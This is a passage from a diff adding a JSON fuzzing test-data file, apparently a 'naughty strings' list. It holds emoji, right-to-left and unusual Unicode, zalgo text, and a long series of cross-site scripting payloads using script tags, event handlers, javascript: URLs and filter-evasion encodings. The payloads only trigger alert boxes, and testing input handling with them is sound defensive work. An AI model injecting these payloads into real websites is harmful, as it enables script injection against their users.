+    "string": "ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(｡◕ ∀ ◕｡)"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "｀ｨ(´∀｀∩"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "__ﾛ(,_,*)"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "・(￣∀￣)・:*:"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(╯°□°）╯︵ ┻━┻)"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(ﾉಥ益ಥ）ﾉ﻿ ┻━┻"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "┬─┬ノ( º _ ºノ)"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "( ͡° ͜ʖ ͡°)"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "¯\\_(ツ)_/¯"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "😍"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👩🏽"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "🐵 🙈 🙉 🙊"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟"
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸"
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸🇦🇫🇦🇲"
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸🇦"
+  },
+  {
+    "category": "Strings which contain unicode numbers; if the code is localized, it should see the input as numeric",
+    "string": "１２３"
+  },
+  {
+    "category": "Strings which contain unicode numbers; if the code is localized, it should see the input as numeric",
+    "string": "١٢٣"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو."
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "הָיְתָהtestالصفحات التّحول"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "﷽"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "ﷺ"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "الكل في المجمو عة (5)"
+  },
+  {
+    "category": "The only unicode alphabet to use a space which isn't empty but should still act like a space.",
+    "string": "᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜"
+  },
+  {
+    "category": "The only unicode alphabet to use a space which isn't empty but should still act like a space.",
+    "string": "᚛                 ᚜"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "‪‪test‪"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "‫test‫"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "test"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "test⁠test‫"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "⁦test⁧"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮"
+  },
+  {
+    "category": "Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)",
+    "string": "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥"
+  },
+  {
+    "category": "Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)",
+    "string": "00˙Ɩ$-"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐"
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script>alert(0)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "&lt;script&gt;alert(&#39;1&#39;);&lt;/script&gt;"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=alert(2) />"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<svg><script>123<1>alert(3)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"><script>alert(4)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'><script>alert(5)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "><script>alert(6)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "</script><script>alert(7)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "< / script >< script >alert(8)< / script >"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "onfocus=JaVaSCript:alert(9) autofocus"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\" onfocus=JaVaSCript:alert(10) autofocus"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "' onfocus=JaVaSCript:alert(11) autofocus"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "＜script＞alert(12)＜/script＞"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<sc<script>ript>alert(13)</sc</script>ript>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "--><script>alert(14)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\";alert(15);t=\""
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "';alert(16);t='"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "JavaSCript:alert(17)"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": ";alert(18);"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "src=JaVaSCript:prompt(19)"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"><script>alert(20);</script x=\""
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'><script>alert(21);</script x='"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "><script>alert(22);</script x="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\" autofocus onkeyup=\"javascript:alert(23)"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "' autofocus onkeyup='javascript:alert(24)"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x20type=\"text/javascript\">javascript:alert(25);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x3Etype=\"text/javascript\">javascript:alert(26);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Dtype=\"text/javascript\">javascript:alert(27);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x09type=\"text/javascript\">javascript:alert(28);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Ctype=\"text/javascript\">javascript:alert(29);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x2Ftype=\"text/javascript\">javascript:alert(30);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Atype=\"text/javascript\">javascript:alert(31);</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'`\"><\\x3Cscript>javascript:alert(32)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'`\"><\\x00script>javascript:alert(33)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x\\x3Aexpression(javascript:alert(34)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:expression\\x5C(javascript:alert(35)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:expression\\x00(javascript:alert(36)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:exp\\x00ression(javascript:alert(37)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:exp\\x5Cression(javascript:alert(38)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Aexpression(javascript:alert(39)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x09expression(javascript:alert(40)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(41)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(42)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(43)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(44)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(45)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Dexpression(javascript:alert(46)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Cexpression(javascript:alert(47)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(48)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(49)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x20expression(javascript:alert(50)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(51)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x00expression(javascript:alert(52)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(53)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(54)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(55)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(56)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Bexpression(javascript:alert(57)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(58)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(59)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(60)\">DEF"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Bjavascript:javascript:alert(61)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Fjavascript:javascript:alert(62)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xC2\\xA0javascript:javascript:alert(63)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x05javascript:javascript:alert(64)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(65)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x18javascript:javascript:alert(66)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x11javascript:javascript:alert(67)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(68)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(69)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(70)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x17javascript:javascript:alert(71)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x03javascript:javascript:alert(72)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Ejavascript:javascript:alert(73)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Ajavascript:javascript:alert(74)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x00javascript:javascript:alert(75)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x10javascript:javascript:alert(76)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(77)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x20javascript:javascript:alert(78)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x13javascript:javascript:alert(79)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x09javascript:javascript:alert(80)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(81)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x14javascript:javascript:alert(82)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x19javascript:javascript:alert(83)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(84)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Fjavascript:javascript:alert(85)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(86)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Djavascript:javascript:alert(87)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(88)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x07javascript:javascript:alert(89)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(90)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(91)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x04javascript:javascript:alert(92)\" id=\"fuzzelement1\">test</a>"
